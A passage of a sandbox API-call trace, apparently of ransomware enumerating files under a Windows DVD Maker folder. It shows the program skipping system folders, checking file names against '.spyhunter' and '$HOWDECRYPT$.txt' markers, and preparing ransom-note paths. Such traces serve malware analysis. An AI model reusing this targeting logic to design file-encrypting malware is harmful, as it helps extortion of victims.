(lpString="Windows") returned 7 [0092.534] lstrcmpiW (lpString1="full.png", lpString2="$Recycle.bin") returned 1 [0092.534] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.534] lstrcmpiW (lpString1="full.png", lpString2="System Volume Information") returned -1 [0092.534] lstrlenW (lpString="System Volume Information") returned 25 [0092.534] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png") returned 61 [0092.534] StrStrIW (lpFirst="full.png", lpSrch=".spyhunter") returned 0x0 [0092.534] lstrcmpW (lpString1="full.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.534] lstrcmpW (lpString1="full.png", lpString2="_uninstalling_.png") returned 1 [0092.534] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png") returned 61 [0092.534] GetProcessHeap () returned 0x2c0000 [0092.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xbc) returned 0x32d8d8 [0092.534] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1548) returned 0x2c310e0 [0092.534] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.534] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.534] lstrlenW (lpString="Windows") returned 7 [0092.534] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.534] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.534] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.534] lstrlenW (lpString="System Volume Information") returned 25 [0092.534] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 85 [0092.534] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.534] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.534] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.535] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png") returned 85 [0092.535] GetProcessHeap () returned 0x2c0000 [0092.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x3555a0 [0092.535] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1550) returned 0x2c310e0 [0092.535] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.535] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.536] lstrlenW (lpString="Windows") returned 7 [0092.536] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.536] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.536] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.536] lstrlenW (lpString="System Volume Information") returned 25 [0092.537] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png") returned 91 [0092.537] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.537] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.537] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.537] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png") returned 91 [0092.537] GetProcessHeap () returned 0x2c0000 [0092.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf8) returned 0x35a160 [0092.537] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1558) returned 0x2c310e0 [0092.537] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.537] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.537] lstrlenW (lpString="Windows") returned 7 [0092.537] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.537] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.537] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.537] lstrlenW (lpString="System Volume Information") returned 25 [0092.537] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png") returned 86 [0092.537] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.537] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.537] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.537] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png") returned 86 [0092.537] GetProcessHeap () returned 0x2c0000 [0092.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x355698 [0092.537] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1560) returned 0x2c310e0 [0092.538] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.538] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.538] lstrlenW (lpString="Windows") returned 7 [0092.538] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.538] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.538] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.538] lstrlenW (lpString="System Volume Information") returned 25 [0092.538] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png") returned 92 [0092.538] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.538] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.538] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.538] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png") returned 92 [0092.538] GetProcessHeap () returned 0x2c0000 [0092.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x381880 [0092.538] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1568) returned 0x2c310e0 [0092.538] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.538] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.538] lstrlenW (lpString="Windows") returned 7 [0092.538] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.538] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.538] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.538] lstrlenW (lpString="System Volume Information") returned 25 [0092.538] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png") returned 83 [0092.538] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.539] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.539] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.539] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png") returned 83 [0092.539] GetProcessHeap () returned 0x2c0000 [0092.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x34f058 [0092.539] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1570) returned 0x2c310e0 [0092.539] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.539] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.539] lstrlenW (lpString="Windows") returned 7 [0092.539] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.539] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.539] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.539] lstrlenW (lpString="System Volume Information") returned 25 [0092.539] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png") returned 89 [0092.539] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.539] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.539] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.539] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png") returned 89 [0092.539] GetProcessHeap () returned 0x2c0000 [0092.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x35a260 [0092.539] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1578) returned 0x2c310e0 [0092.539] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.539] lstrcmpiW (lpString1="pushplaysubpicture.png", lpString2="Windows") returned -1 [0092.540] lstrlenW (lpString="Windows") returned 7 [0092.540] lstrcmpiW (lpString1="pushplaysubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.540] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.540] lstrcmpiW (lpString1="pushplaysubpicture.png", lpString2="System Volume Information") returned -1 [0092.540] lstrlenW (lpString="System Volume Information") returned 25 [0092.540] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 75 [0092.540] StrStrIW (lpFirst="pushplaysubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.540] lstrcmpW (lpString1="pushplaysubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.540] lstrcmpW (lpString1="pushplaysubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.540] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png") returned 75 [0092.540] GetProcessHeap () returned 0x2c0000 [0092.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346648 [0092.540] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1580) returned 0x2c310e0 [0092.540] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0092.540] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0092.541] wnsprintfW (in: pszDest=0x2c13898, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\$HOWDECRYPT$.txt") returned 69 [0092.541] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\$HOWDECRYPT$.txt") returned 69 [0092.541] GetProcessHeap () returned 0x2c0000 [0092.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e200 [0092.541] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1588) returned 0x2c310e0 [0092.541] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.541] lstrcmpiW (lpString1="Heart_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.541] lstrlenW (lpString="Windows") returned 7 [0092.541] lstrcmpiW (lpString1="Heart_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.541] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.541] lstrcmpiW (lpString1="Heart_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.542] lstrlenW (lpString="System Volume Information") returned 25 [0092.542] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 71 [0092.542] StrStrIW (lpFirst="Heart_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.542] lstrcmpW (lpString1="Heart_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.542] lstrcmpW (lpString1="Heart_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.542] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_ButtonGraphic.png") returned 71 [0092.542] GetProcessHeap () returned 0x2c0000 [0092.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e7e8 [0092.542] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1590) returned 0x2c310e0 [0092.542] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.542] lstrcmpiW (lpString1="heart_glass_Thumbnail.bmp", lpString2="Windows") returned -1 [0092.542] lstrlenW (lpString="Windows") returned 7 [0092.542] lstrcmpiW (lpString1="heart_glass_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0092.542] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.542] lstrcmpiW (lpString1="heart_glass_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0092.542] lstrlenW (lpString="System Volume Information") returned 25 [0092.542] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 73 [0092.542] StrStrIW (lpFirst="heart_glass_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0092.542] lstrcmpW (lpString1="heart_glass_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.542] lstrcmpW (lpString1="heart_glass_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0092.542] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\heart_glass_Thumbnail.bmp") returned 73 [0092.542] GetProcessHeap () returned 0x2c0000 [0092.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346808 [0092.543] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1598) returned 0x2c310e0 [0092.543] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.543] lstrcmpiW (lpString1="Heart_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.543] lstrlenW (lpString="Windows") returned 7 [0092.543] lstrcmpiW (lpString1="Heart_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.543] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.543] lstrcmpiW (lpString1="Heart_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.543] lstrlenW (lpString="System Volume Information") returned 25 [0092.543] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png") returned 77 [0092.543] StrStrIW (lpFirst="Heart_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.543] lstrcmpW (lpString1="Heart_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.543] lstrcmpW (lpString1="Heart_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.543] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_SelectionSubpicture.png") returned 77 [0092.543] GetProcessHeap () returned 0x2c0000 [0092.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3780d8 [0092.543] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a0) returned 0x2c310e0 [0092.543] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.543] lstrcmpiW (lpString1="Heart_VideoInset.png", lpString2="Windows") returned -1 [0092.543] lstrlenW (lpString="Windows") returned 7 [0092.543] lstrcmpiW (lpString1="Heart_VideoInset.png", lpString2="$Recycle.bin") returned 1 [0092.543] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.543] lstrcmpiW (lpString1="Heart_VideoInset.png", lpString2="System Volume Information") returned -1 [0092.543] lstrlenW (lpString="System Volume Information") returned 25 [0092.543] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png") returned 68 [0092.544] StrStrIW (lpFirst="Heart_VideoInset.png", lpSrch=".spyhunter") returned 0x0 [0092.544] lstrcmpW (lpString1="Heart_VideoInset.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.544] lstrcmpW (lpString1="Heart_VideoInset.png", lpString2="_uninstalling_.png") returned 1 [0092.544] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Heart_VideoInset.png") returned 68 [0092.544] GetProcessHeap () returned 0x2c0000 [0092.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x37e560 [0092.544] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a8) returned 0x2c310e0 [0092.544] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.544] lstrcmpiW (lpString1="HueCycle", lpString2="Windows") returned -1 [0092.544] lstrlenW (lpString="Windows") returned 7 [0092.544] lstrcmpiW (lpString1="HueCycle", lpString2="$Recycle.bin") returned 1 [0092.544] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.544] lstrcmpiW (lpString1="HueCycle", lpString2="System Volume Information") returned -1 [0092.544] lstrlenW (lpString="System Volume Information") returned 25 [0092.544] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle") returned 56 [0092.544] lstrcmpW (lpString1="HueCycle", lpString2=".") returned 1 [0092.544] lstrcmpW (lpString1="HueCycle", lpString2="..") returned 1 [0092.544] GetProcessHeap () returned 0x2c0000 [0092.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0092.544] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*") returned 58 [0092.544] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0092.554] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.554] lstrlenW (lpString="Windows") returned 7 [0092.554] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.554] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.554] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.554] lstrlenW (lpString="System Volume Information") returned 25 [0092.554] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\.") returned 58 [0092.554] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.554] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.555] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.555] lstrlenW (lpString="Windows") returned 7 [0092.555] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.555] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.555] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.555] lstrlenW (lpString="System Volume Information") returned 25 [0092.555] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\..") returned 59 [0092.555] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.555] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.555] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.555] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0092.555] lstrlenW (lpString="Windows") returned 7 [0092.555] lstrcmpiW (lpString1="1047x576black.png", lpString2="$Recycle.bin") returned 1 [0092.555] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.555] lstrcmpiW (lpString1="1047x576black.png", lpString2="System Volume Information") returned -1 [0092.555] lstrlenW (lpString="System Volume Information") returned 25 [0092.555] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 74 [0092.555] StrStrIW (lpFirst="1047x576black.png", lpSrch=".spyhunter") returned 0x0 [0092.555] lstrcmpW (lpString1="1047x576black.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.555] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0092.555] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 74 [0092.555] GetProcessHeap () returned 0x2c0000 [0092.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x346c68 [0092.556] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a8) returned 0x2c310e0 [0092.556] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.556] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0092.556] lstrlenW (lpString="Windows") returned 7 [0092.556] lstrcmpiW (lpString1="15x15dot.png", lpString2="$Recycle.bin") returned 1 [0092.556] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.556] lstrcmpiW (lpString1="15x15dot.png", lpString2="System Volume Information") returned -1 [0092.556] lstrlenW (lpString="System Volume Information") returned 25 [0092.556] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 69 [0092.556] StrStrIW (lpFirst="15x15dot.png", lpSrch=".spyhunter") returned 0x0 [0092.556] lstrcmpW (lpString1="15x15dot.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.556] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0092.556] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 69 [0092.556] GetProcessHeap () returned 0x2c0000 [0092.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e638 [0092.556] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b0) returned 0x2c310e0 [0092.556] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.556] lstrcmpiW (lpString1="colorcycle.png", lpString2="Windows") returned -1 [0092.556] lstrlenW (lpString="Windows") returned 7 [0092.556] lstrcmpiW (lpString1="colorcycle.png", lpString2="$Recycle.bin") returned 1 [0092.556] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.556] lstrcmpiW (lpString1="colorcycle.png", lpString2="System Volume Information") returned -1 [0092.556] lstrlenW (lpString="System Volume Information") returned 25 [0092.557] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 71 [0092.557] StrStrIW (lpFirst="colorcycle.png", lpSrch=".spyhunter") returned 0x0 [0092.557] lstrcmpW (lpString1="colorcycle.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.557] lstrcmpW (lpString1="colorcycle.png", lpString2="_uninstalling_.png") returned 1 [0092.557] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png") returned 71 [0092.557] GetProcessHeap () returned 0x2c0000 [0092.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e710 [0092.557] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b8) returned 0x2c310e0 [0092.557] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.557] lstrcmpiW (lpString1="huemainsubpicture2.png", lpString2="Windows") returned -1 [0092.557] lstrlenW (lpString="Windows") returned 7 [0092.557] lstrcmpiW (lpString1="huemainsubpicture2.png", lpString2="$Recycle.bin") returned 1 [0092.557] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.557] lstrcmpiW (lpString1="huemainsubpicture2.png", lpString2="System Volume Information") returned -1 [0092.557] lstrlenW (lpString="System Volume Information") returned 25 [0092.557] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 79 [0092.557] StrStrIW (lpFirst="huemainsubpicture2.png", lpSrch=".spyhunter") returned 0x0 [0092.557] lstrcmpW (lpString1="huemainsubpicture2.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.557] lstrcmpW (lpString1="huemainsubpicture2.png", lpString2="_uninstalling_.png") returned 1 [0092.557] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 79 [0092.557] GetProcessHeap () returned 0x2c0000 [0092.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x377ff0 [0092.557] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c0) returned 0x2c310e0 [0092.557] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: 